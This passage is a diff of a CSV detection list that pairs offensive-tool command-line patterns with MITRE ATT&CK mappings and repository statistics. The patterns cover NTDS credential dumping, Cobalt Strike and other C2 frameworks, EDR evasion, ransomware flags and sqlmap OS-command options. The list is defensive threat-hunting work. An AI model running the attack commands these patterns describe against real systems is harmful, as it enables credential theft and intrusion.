Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* -NoPRo -wIN 1 -nONi -eN Sh33L*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation 
tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "* --no-prop*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --no-prop-servers*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -1382,17 +1382,17 @@
 "* nping-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "* nrpe-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "* NtCr3at3Thr3adEx @ *","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","0","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z"
-"* -ntds *.dit *-system *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
-"* -ntds NTDS.dit -filters*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","73","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z"
-"* -ntds NTDS.dit -system SYSTEM -outputdir /*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","73","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z"
+"* -ntds *.dit *-system *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"* -ntds NTDS.dit -filters*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z"
+"* -ntds NTDS.dit -system SYSTEM -outputdir /*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z"
 "* -ntds ntds.dit.save -system system.save LOCAL*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"* --ntds-history*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
-"* --ntds-pwdLastSet*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
-"* -nthash * -domain-sid *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"* --ntds-history*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* --ntds-pwdLastSet*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* -nthash * -domain-sid *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
 "* -nthash * -spn * -domain-sid * -domain *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "* -nthash *-domain-sid S-1-5-11-39129514-1145628974-103568174 -domain*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"* ntlm.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
-"* ntlm.wordlist *--hex-wordlist*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","0","N/A","10","10","18342","2659","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z"
+"* ntlm.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"* ntlm.wordlist *--hex-wordlist*","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","0","N/A","10","10","18349","2660","2023-10-03T07:17:40Z","2015-12-04T14:46:51Z"
 "* --ntlm-proxy-ip * --ntlm-proxy-port *","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z"
 "* ntlmrecon*","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","0","N/A","N/A","5","419","67","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z"
 "* NTLMv1 captured *","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z"
@@ -1404,18 +1404,18 @@
 "* NuagesImplant*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z"
 "* -o /share/payloads/*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z"
 "* -o cowroot*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/exrienz/DirtyCow","1","0","N/A","N/A","1","27","27","2018-07-23T02:07:24Z","2017-05-12T10:38:20Z"
-"* -o ffuf.csv*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z"
+"* -o ffuf.csv*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z"
 "* -oA icebreaker-scan*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z"
-"* --obfuscate *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"* --obfuscate *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
 "* octopus.py*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z"
-"* -old-bloodhound*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z"
+"* -old-bloodhound*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z"
 "* omp2-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "* omp2-enum-targets.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "* omron-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"* --oneliner-nothidden*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"* --oneliner-nothidden*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
 "* onesixtyone.c*","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","0","N/A","N/A","5","416","86","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z"
-"* --only-abuse --dc-host *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
-"* --only-known-exploit-paths*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z"
+"* --only-abuse --dc-host *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"* --only-known-exploit-paths*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z"
 "* openflow-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "* openlookup-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "* openvas-otp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
@@ -1425,62 +1425,62 @@ "* oracle-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* oracle-sid-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* oracle-tns-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --os-bof*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"* --os-cmd whoami*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"* --os-pwn*","offensive_tool_keyword","sqlmap","Automatic SQL injection 
and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"* --os-smbrelay*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --os-bof*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --os-cmd whoami*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --os-pwn*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --os-smbrelay*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - 